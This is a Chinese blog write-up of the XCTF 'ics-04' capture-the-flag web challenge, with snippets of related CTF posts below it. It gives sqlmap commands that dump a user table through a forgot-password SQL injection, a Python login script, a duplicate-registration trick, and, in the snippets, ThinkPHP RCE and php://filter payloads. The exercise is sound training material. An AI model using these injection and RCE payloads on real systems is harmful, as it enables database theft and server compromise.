XCTF-高手进阶区:ics-04

最新推荐文章于 2021-11-07 20:14:51 发布
最新推荐文章于 2021-11-07 20:14:51 发布
阅读量431 收藏 1
点赞数 1
分类专栏: CTF刷题 文章标签: XCTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41617034/article/details/105469966
版权

题目:
在这里插入图片描述
解题思路:
注入点在忘记密码处,使用sqlmap一把梭

sqlmap -r 1.txt --dbs --batch
sqlmap -r 1.txt --dbs --batch -D cetc004 -T user -C 'username,password' --dump

在这里插入图片描述
直接解密md5,解密网址:https://www.somd5.com/
然后使用c3tlwDmIn23登录,即可获得flag

注:如果md5无法解密还可使用如下方法
1、利用可以重复注册的漏洞,测试方法,使用c3tlwDmIn23作为用户名重新注册,设置自己知道的密码,然后登陆,即可获得flag
2、网上还有一种,使用py脚本,但目前无法显示flag了,只有正确的密码才可以。经过抓包发现他不是前端md5加密,再和后端数据库中加密后的密码进行比对;有可能是后端md5加密,然后再进行比对
贴一下代码:如果以后有类似题目,可以参考

import requests

url = 'http://159.138.137.79:61667/login.php'
username = 'c3tlwDmIn23'
password = '2f8667f381ff50ced6a3edc259260ba9'
data = {'username':username,
		'password':password}
req = requests.post(url,data=data)
req.encoding='utf-8'
print (req.text)
1stPeak
关注
专栏目录
攻防世界ics-04解题思路
zsqad的博客
12-10 1774
题目 攻防世界ics-04 工控云管理系统新添加的登录和注册页面存在漏洞,请找出flag。 解题思路 打开题目提供的环境,发现整个页面只有注册、登录、找回密码功能是可以用的,尝试注册一个账户进行登录,提示普通用户登录成功,没什么用,可以猜测出题者的意图是让我们拿到管理员账号登录获得flag。 打开找回密码界面,随意输入一个用户名,发现界面上会提示没有这个用户,因此此处应该可以爆破用户名,但是如果用...
XCTF-WEB进阶-PHP2
Lorezon的博客
03-14 172
打开题目发现只有一行字: 既然没什么有用的信息就看看常见的index页面,但是发现依然没有什么有用的信息,查看忽略的phps页面,有了结果: 得到了代码,查看源码进行分析 <?php if("admin"===$_GET[id]) { echo("<p>not allowed!</p>"); exit(); } $_GET[id] = urldecode($...
XCTF ics-04
qq_41941506的博客
05-20 2844
根据题目提示在登录及注册中有漏洞 首先进入登录界面,寻求漏洞,BP抓包,发现为明文传输,第一个想到爆破,但是爆破结果不尽人意,没有任何用出;接下来进行SQL注入尝试,但是俩个界面均没有POST注入漏洞,正要放弃时,发现在登录界面还有一个忘记密码界面,尝试在该界面进行SQL注入, python2 sqlmap.py -r post.txt --dump -C "username,password...
攻防世界XCTFics-04
末初的CSDN博客
03-13 1125
有三个可以访问的地方,注册,登录和找回密码 注册功能:没有sql注入,但是测试出一个账号可以重复注册 登录功能:也没有sql注入,一个账号能够使用不同的面登录 找回密码页面存在SQL注入 sqlmap扫一波 记住需要指定参数 python2 sqlmap.py -u "http://111.198.29.45:33573/findpwd.php" --data="username=1" ...
2020.4.10 xctf(ics-04)
DSR446的博客
04-20 503
题目提示在登陆、注册页面有SQL注入漏洞 除了忘记密码的那块,其他地方都没找到注入点 用sqlmap在这里跑一下,看有没有注入 获取数据库名: python sqlmap.py -u "http://159.138.137.79:49507/findpwd.php" --data "username=1" --dbs --batch 获取表名: python sqlmap.py -u "http...
攻防世界web高手进阶ics-04
weixin_43885355的博客
11-26 1571
攻防世界web高手进阶ics-04 这是看了 harry_c 写的,做的一个补充,harry_c 写的链接是: https://blog.csdn.net/harry_c/article/details/98540820 写得粗糙多多见谅 实操 1、使用命令进行sql注入,猜解到4个数据库 cetc004 information_schema mysql performance_schema 2...
XCTF-2019-tfboys:XCTF 2019最终网络任务“ tfboys”的源代码
05-18
XCTF-2019-tfboys tfboys又名TensorFlow Boys 部署(Python3) pip install -r requirements.txt cd web3 python run.py 迪尔斯 web3/model/default/ : pre-trained LSTM model. exploit/exploit.ipynb : codes...
XCTF-Web高手进阶 ics-07
feng的博客
10-28 276
WP 进入环境,按照提示进入项目管理页面,点击view-source得到源码: <?php session_start(); if (!isset($_GET[page])) { show_source(__FILE__); die(); } if (isset($_GET[page]) && $_GET[page] != 'index.php') { include('flag.php'); }else { header('Location: ?p
XCTF-WEB进阶php_rce
Lorezon的博客
03-15 320
打开题目出现网页: 在网上查了TinkPHP的漏洞复现,得到payload如下: ?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20%27system("cat%20../../../flag");%27 漏洞复现具体...
xctf ics-02
weixin_51861515的博客
11-07 312
访问网址,打开文档中心,查看源代码。 发现 secure/default.php(没啥用) 和<a href="download.php?dl=ssrf">paper. </a> 会下载一个download.php文件。(浏览器的自解码机制,a标签的href属性会进行URL解码)。 打开看一下 没啥有用的信息。 可以用的信息太少了,dirsearch扫一下。 访问secret/ secret.php是一个注册页面,secret_deb...
xctf-ics05
Mars748的博客
11-12 427
xctf里面的一道web题ics05 这道题给了提示:其他破坏者会利用工控云管理系统设备维护中心的后门入侵系统 既然说了是设备维护中心的漏洞,打开设备维护中心,什么东西也没有,查看源码也没有啥东西。 这时候瞎点,点到了网页上面的导航上 云平台设备维护中心发现有变化。发现page的值会显示出来。 将page的参数改成index.php发现页面显示ok,改成其他的(比如flag.php)页面啥都没显...
XCTF进阶Crypto之你猜猜 write up
克格莫(有需要的私信)
07-02 2034
我们刚刚拦截了,敌军的文件传输获取一份机密文件,请君速速破解。 下载下来是个txt,里面一串神秘代码: 504B03040A0001080000626D0A49F4B5091F1E0000001200000008000000666C61672E7478746C9F170D35D0A45826A03E161FB96870EDDFC7C89A11862F9199B4CD78E7504B01023F000A0001080000626D0A49F4B5091F1E00000012000000080024000
[xctf]ics-04
胖胖的ALEX
07-10 4399
类型:web 网址:https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=1&id=4918 描述:工控云管理系统新添加的登录和注册页面存在漏洞,请找出flag 一句话总结:sql注入、业务逻辑漏洞 过程: 有三个可以访问的功能,注册、登录和找回密码 注册功能:没有sql注入,一个账号可以重复注册漏洞...
攻防世界-web-ics-06--XCTF 4th-CyberEarth
Sea_Sand息禅
04-23 6349
进入index.php,发现可以传参,bp爆破,当id=2333时拿到flag
xctf(web)-ics-05
i_am_not_hacker的博客
08-08 939
本题的题目描述如下图所示,查看“设备维护中心” 再查看源码,也没有找到线索,通过php伪协议查看源码 php伪协议参考文章 在题目所给的url后加 ?page=php://filter/convert.base64-encode/resource=index.php 即可查到base64加密后的源码 base64解码后,查看代码,发现后门 //方便的实现输入输出的功能,正在开发中的功能,只能内部...
XCTF-RE】新手练习-no-strings-attached-解压密码:十三陵陈飞宇.rar
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/qffkcv
xctf 攻防世界-forgot writeup
qq_43189757的博客
07-08 1801
根据ida反汇编的结果可以发现有两处溢出点,第一处溢出点没什么作用,只能观察第二处溢出点 可以观察到箭头处是个函数指针,&v3 是v3在栈上的地址,&v3 + --v14 是根据&v3在栈上移动,上面的for循环是用来改变v14的值,根据溢出点函数指针v3到v12 ,变量v14都可以被我们控制,接下来再找找有没有system函数 发现目标函数,接下来我的想法是利用缓冲...
2019XCTF攻防世界之萌新入坑(time_formatter)
weixin_44113469的博客
04-11 1954
time_formatter
xctf_web ics-05
fly夏天的博客
09-23 592
刚打开网站 点击各个按钮发现除了一个index页面,没有别的变化。 尝试扫描,没扫出东西,看来问题就在这个index页面上了 这里我尝试查看了源码,并没有发现啥有用的东西。 只有一个可传参的参数page。 拜读了大佬的攻略,才发现可以利用文件读写漏洞读取源码。 page=php://filter/read=convert.base64-encode/resource=index.p...
XCTF(攻防世界)—新手web题Write Up
Lemon's blog
07-10 2732
前言:之前一直没有接触过web这方面的题,这次利用暑假时光好好学习,web真的是很有趣,虽然有的题很简单,但可以学习到很多知识,话不多说,做题。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

1stPeak

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值